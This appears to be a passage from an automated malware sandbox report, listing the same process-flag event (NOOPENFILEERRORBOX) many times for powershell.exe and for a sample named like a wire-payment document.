Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
